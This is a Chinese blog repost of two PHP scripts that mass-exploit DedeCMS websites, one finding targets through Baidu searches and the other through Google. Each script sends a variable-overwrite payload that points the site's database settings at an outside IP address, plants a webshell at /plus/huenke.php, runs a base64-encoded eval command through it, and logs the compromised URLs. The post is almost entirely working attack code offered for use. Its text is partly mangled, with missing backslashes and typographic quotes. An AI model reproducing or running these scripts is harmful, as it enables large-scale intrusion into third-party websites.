dede批量Getshell脚本【转】
2011-10-05 | pyinx | 安全

这个是百度批量的。自己保存为xx.php

<?php

print_r(‘

[-]Exploit Title: DEDEcmsVariable coverage

[-]Date: 1182011

[-]Getshell Author: cfking#90sec.org

[-]Site from baidu

);

error_reporting(E_ERROR);

set_time_limit(0);

$keyword=’inurl:/plus/flink_add.php’ ; //

$timeout = 30;

$stratpage = 1;

$lastpage = 10000000; //

for ($i=$stratpage ; $i<=$lastpage ; $i++ ){

$array=ReadBaiduList($keyword,$timeout,$i);

foreach ($array as $url ){

$url_list=file(‘c:/url.txt’);

if (in_array(“$urlrn”,$url_list)){

echo “[-] Links repeatn”;

}else{

$fp = @fopen(‘c:/url.txt’, ‘a’);

@fwrite($fp, $url.”rn”);

@fclose($fp);

print_r(“

[-] Geting URL: $urlrn”);

$exploit=Getshell($url);

if (strpos($exploit,”OK”)>2){

echo “[*] “.$url.”/plus/huenke.phprn”;

$name=rname($url);

if(strpos($name,”200”)>5){

echo “[*] Rename Successn”;

echo “[*] Record Successn”;

$fp = @fopen(‘c:/2010.txt’, ‘a’);

@fwrite($fp, $url.”/plus/huenke.phprn”);

@fclose($fp);

      }

   }

}

}

}

 

function Getshell($url){

$host=$url;

$port=”80”;

$content =”doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%

3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%

5D=119.98.61.174&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%

5D=root&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=huenke&_COOKIE%

5BGLOBALS%5D%5Bcfg_dbname%5D=dedecmsv56gbk&_COOKIE%5BGLOBALS%

5D%5Bcfgdbprefix%5D=dede&nocache=true&QuickSearchBtn=%CC%E1%

BD%BB”;

$data = “POST /plus/mytag_js.php?aid=1 HTTP/1.1rn”;

$data .= “Host: “.$host.”rn”;

$data .= “User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1)

Gecko/20100101 Firefox/5.0.1rn”;

$data .= “Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

rn”;

$data .= “Accept-Language: zh-cn,zh;q=0.5rn”;

//$data .= “Accept-Encoding: gzip,deflatern”;

$data .= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn”;

$data .= “Connection: keep-alivern”;

$data .= “Content-Type: application/x-www-form-urlencodedrn”;

$data .= “Content-Length: “.strlen($content).”rnrn”;

$data .= $content.”rn”;

$ock=fsockopen($host,$port);

if (!$ock) {

echo “[*] No response from “.$host;

}

fwrite($ock,$data);

while (!feof($ock)) {

$exp=fgets($ock, 1024);

return $exp;

}

}

function ReadBaiduList($keyword,$timeout,$nowpage)

{

$tmp = array();

//$data = ‘’;

$nowpage = ($nowpage-1)*10;

$fp = @fsockopen(‘www.baidu.com’,80,$errno,$errstr,$timeout);

@fputs($fp,”GET /s?wd=”.urlencode($keyword).”&pn=”.$nowpage.”

HTTP/1.1rnHost:www.baidu.comrnConnection: Closernrn”);

while ($fp && !feof($fp))

$data .= fread($fp, 1024);

@fclose($fp);

preg_match_all(“/})” href=”http://([^~]*?)”

target=”_blank”/i”,$data,$tmp);

$num = count($tmp[1]);

$array = array();

for($i = 0;$i < $num;$i++)

{

$row = explode(‘/‘,$tmp[1][$i]);

$array[] = str_replace(‘http://','',$row[0]);

}

return $array;

}

function rname($url){

$host=$url;

$port=”80”;

$content =’huenke=@eval(base64_decode($_POST

[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZ

V9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%

2BfCIpOztpZiAocmVuYW1lKCdteXRhZ19qcy5waHAnLCdteXRhZ19qc19iYWsucG

hwJykpZWNobyAiWUVTIjs7ZWNobygifDwtIik7ZGllKCk7’;

$data = “POST /plus/huenke.php HTTP/1.1rn”;

$data .= “X-Forwarded-For: 199.1.88.29rn”;

$data .= “Referer: http://$hostrn“;

$data .= “Content-Type: application/x-www-form-urlencodedrn”;

$data .= “User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-

US) Firefox/3.5.0rn”;

//$data .= “Accept-Encoding: gzip,deflatern”;

$data .= “Host: $hostrn”;

$data .= “Content-Length: “.strlen($content).”rn”;

$data .= “Cache-Control: no-cachernrn”;

$data .= $content.”rn”;

$ock=fsockopen($host,$port);

if (!$ock) {

echo “[*] No response from $hostn”;

}

fwrite($ock,$data);

while (!feof($ock)) {

$exp=fgets($ock, 1024);

return $exp;

}

}

?>
 

这个是谷歌批量的,用法同上

<?php

print_r(‘

[-]Exploit Title: DEDEcms Variable coverage

[-]Date: 1182011

[-]Getshell Author: cfking#90sec.org

[-]Site from google

);

error_reporting(E_ERROR);

set_time_limit(0);

$keyword=’/plus/search.php’ ;

$timeout = 30;

$stratpage = 5;

$lastpage = 10000000; //

for ($i=$stratpage ; $i<=$lastpage ; $i++ ){

$array=ReadgoogleList($keyword,$timeout,$i);

foreach ($array as $url ){

$url_list=file(‘c:/url.txt’);

if (in_array(“$urlrn”,$url_list)){

echo “[*] Links repeatn”;

}else{

$fp = @fopen(‘c:/url.txt’, ‘a’);

@fwrite($fp, $url.”rn”);

@fclose($fp);

print_r(“

[-] Geting URL: $urlrn”);

$exploit=Getshell($url);

if (strpos($exploit,”OK”)>2){

echo “[*] “.$url.”/plus/huenke.phprn”;

$name=rname($url);

if(strpos($name,”200”)>5){

echo “[*] Rename Successn”;

echo “[*] Record Successn”;

$fp = @fopen(‘c:/2012.txt’, ‘a’);

@fwrite($fp, $url.”/plus/huenke.phprn”);

@fclose($fp);

      }

   }

}

}

}

function Getshell($url){

$host=$url;

$port=”80”;

$content =”doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=119.98.61.174&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=root&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=huenke&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=dedecmsv56gbk&_COOKIE%5BGLOBALS%5D%5Bcfgdbprefix%5D=dede&nocache=true&QuickSearchBtn=%CC%E1%BD%BB”;//自己抓包修改

$data = “POST /plus/mytag_js.php?aid=1 HTTP/1.1rn”;

$data .= “Host: “.$host.”rn”;

$data .= “User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1rn”;

$data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8rn”;

$data .= “Accept-Language: zh-cn,zh;q=0.5rn”;

//$data .= “Accept-Encoding: gzip,deflatern”;

$data .= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn”;

$data .= “Connection: keep-alivern”;

$data .= “Content-Type: application/x-www-form-urlencodedrn”;

$data .= “Content-Length: “.strlen($content).”rnrn”;

$data .= $content.”rn”;

$ock=fsockopen($host,$port);

if (!$ock) {

echo “[*] No response from $host n”;

}

fwrite($ock,$data);

while (!feof($ock)) {

$exp=fgets($ock, 1024);

return $exp;

}

}

function ReadgoogleList($keyword,$timeout,$nowpage) //返回该页DZ网址列表Array

{

$tmp = array();

$data = ‘’;

$nowpage = ($nowpage-1)*10;

$fp = @fsockopen(‘www.google.com.hk’,80,$errno,$errstr,$timeout);

@fputs($fp,”GET /search?q=”.urlencode($keyword).”&start=”.$nowpage.” HTTP/1.1rnHost:www.google.com.hkrnConnection: Closernrn”);

while ($fp && !feof($fp))

$data .= fread($fp, 102400);

@fclose($fp);

preg_match_all(“/<cite>(.*?)//“,$data,$tmp);

$num = count($tmp[1]);

$array = array();

for($i = 0;$i < $num;$i++)

{

$row = explode(‘/‘,$tmp[1][$i]);

$array[] = str_replace(‘http://','',$row[0]);

}

return $array;

}

function rname($url){

$host=$url;

$port=”80”;

$content =’huenke=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztpZiAocmVuYW1lKCdteXRhZ19qcy5waHAnLCdteXRhZ19qc19iYWsucGhwJykpZWNobyAiWUVTIjs7ZWNobygifDwtIik7ZGllKCk7’;

$data = “POST /plus/huenke.php HTTP/1.1rn”;

$data .= “X-Forwarded-For: 199.1.88.29rn”;

$data .= “Referer: http://$hostrn“;

$data .= “Content-Type: application/x-www-form-urlencodedrn”;

$data .= “User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0rn”;

//$data .= “Accept-Encoding: gzip,deflatern”;

$data .= “Host: $hostrn”;

$data .= “Content-Length: “.strlen($content).”rn”;

$data .= “Cache-Control: no-cachernrn”;

$data .= $content.”rn”;

$ock=fsockopen($host,$port);

if (!$ock) {

echo “[*] No response from $host rn”;

}

fwrite($ock,$data);

while (!feof($ock)) {

$exp=fgets($ock, 1024);

return $exp;

}

}

?>